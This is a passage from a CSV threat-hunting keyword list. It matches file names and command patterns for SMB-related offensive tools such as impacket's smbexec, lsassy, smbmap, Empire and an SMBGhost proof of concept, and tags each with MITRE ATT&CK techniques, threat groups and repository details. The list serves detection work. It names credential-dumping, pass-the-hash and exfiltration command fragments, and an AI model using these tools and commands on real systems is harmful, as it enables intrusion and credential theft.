- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*smb_rras_erraticgopher.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_shadow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_shadow.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_stealth.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*smb_win.py*,offensive_tool_keyword,SMBGhost_RCE_PoC,RCE PoC for CVE-2020-0796 SMBGhost,T1210 - T1059 - T1505 - T1021 - T1027,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chompie1337/SMBGhost_RCE_PoC,1,1,N/A,N/A,10,1264,355,2020-07-02T18:51:47Z,2020-06-02T00:14:47Z -*smb1_anonymous_connect_ipc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smb1_anonymous_login*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-smb2support --remove-mic --shadow-credentials --shadow-target *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*smbcrawler*,offensive_tool_keyword,smbcrawler,SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares,T1077 - T1021 - T1110 - T1083,TA0002 - TA0008 - TA0009,N/A,N/A,Lateral Movement - Collection,https://github.com/SySS-Research/smbcrawler,1,1,N/A,N/A,2,129,13,2023-05-14T06:48:40Z,2021-06-09T19:27:08Z -*SMBeagle.exe*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*SMBeagle.sln*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_linux_amd64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_linux_arm64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbeagle_*_win_x64.zip*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*smbenum.run*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*SMBetray*,offensive_tool_keyword,SMBetray,PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.,T1557 - T1562 - T1553 - T1213,TA0002 - TA0008 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/quickbreach/SMBetray,1,1,N/A,N/A,4,382,97,2018-08-17T00:45:05Z,2018-08-12T00:38:02Z -*-SMBExec*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbexec.py -hashes :*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbexec.py -share*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*smbexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*SMBGhost.pcap*,offensive_tool_keyword,SMBGhost,Simple scanner for CVE-2020-0796 - SMBv3 RCE.,T1210 - T1573 - T1553 - T1216 - T1027,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ollypwn/SMBGhost,1,1,N/A,N/A,7,647,206,2020-10-01T08:36:29Z,2020-03-11T15:21:27Z
-*smbmap -*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*smbmap -u guest -H *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*smbmap.py *,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*smbmap.smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*smbmapDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*smbmap-master*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z
-*SMBNTLMChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SMBNTLMChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SMBNTLMResponse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbpasswd.py -newpass *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbpasswd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*SMBRelay.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*SMBRelayChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
